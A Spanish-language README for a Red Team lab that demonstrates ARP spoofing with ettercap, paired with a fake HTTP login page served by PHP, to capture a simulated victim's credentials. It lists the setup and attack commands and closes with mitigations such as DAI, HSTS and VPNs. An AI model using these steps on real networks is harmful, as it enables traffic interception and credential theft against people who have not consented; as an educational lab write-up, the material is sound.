Este proyecto es el resultado de un proceso de autoaprendizaje y especialización en Red Team. El objetivo es documentar, de forma técnica y controlada, cómo se puede explotar la confianza del protocolo ARP dentro de una red local para interceptar credenciales de servicios que no utilizan cifrado (HTTP).
⚠️ Nota ética: Este laboratorio fue realizado exclusivamente con fines educativos, en un entorno controlado y autorizado.
- GNS3 con GNS3 VM activa (mejor estabilidad)
- Red local simulada
| Rol | Sistema | IP |
|---|---|---|
| Atacante | Kali Linux | 192.168.169.130 |
| Víctima | Windows 10 | 192.168.169.133 |
| Gateway | Router Cisco | 192.168.169.254 |
Creamos el entorno donde vivirá la página de phishing en Kali Linux.
mkdir ~/phish && cd ~/phishCreamos el archivo principal del sitio web:
nano index.html📄 Pega el código HTML del formulario y guarda (
Ctrl + O,Enter,Ctrl + X)
Creamos el procesador de credenciales:
nano login.php📄 Este script PHP almacenará las credenciales capturadas en
credenciales.txt
Iniciamos el servidor web en el puerto 80 para hacerlo accesible desde la red local:
sudo php -S 0.0.0.0:80Para que la víctima no pierda conectividad a Internet, debemos preparar el sistema.
sudo sysctl -w net.ipv4.ip_forward=1Sustituye las IPs según tu entorno (Víctima // Gateway):
sudo ettercap -T -M arp:remote /192.168.169.133// /192.168.169.254// -i eth1-
Desde la máquina víctima, accede a:
http://192.168.169.130 -
Introduce datos en el formulario falso.
-
En Kali Linux, verifica la información capturada:
cat ~/phish/credenciales.txtEste ataque se basa en la ausencia de autenticación del protocolo ARP, lo que permite a Kali Linux posicionarse como Man-in-the-Middle entre la víctima y el gateway.
- Exposición de credenciales: Los datos viajan en texto plano a través de HTTP.
- Falta de cifrado: Demuestra por qué HTTPS (SSL/TLS) es obligatorio en la web moderna.
Las siguientes medidas reducen o eliminan este tipo de ataques:
- DAI (Dynamic ARP Inspection) Bloquea paquetes ARP falsificados en switches gestionados.
- HSTS (HTTP Strict Transport Security) Obliga al navegador a usar HTTPS.
- VPN corporativa Cifra el tráfico punto a punto, inutilizando la interceptación local.
📁 proyecto-mitm-phishing/
│
├── 📁 src/
│ ├── index.html
│ └── login.php
│
├── 📁 assets/
│ ├── topologia-gns3.png
│ └── evidencia-wireshark.png
│
└── README.md
Este laboratorio demuestra cómo una mala configuración de red y la ausencia de cifrado pueden comprometer información sensible, reforzando la importancia de buenas prácticas de seguridad defensiva incluso en redes locales.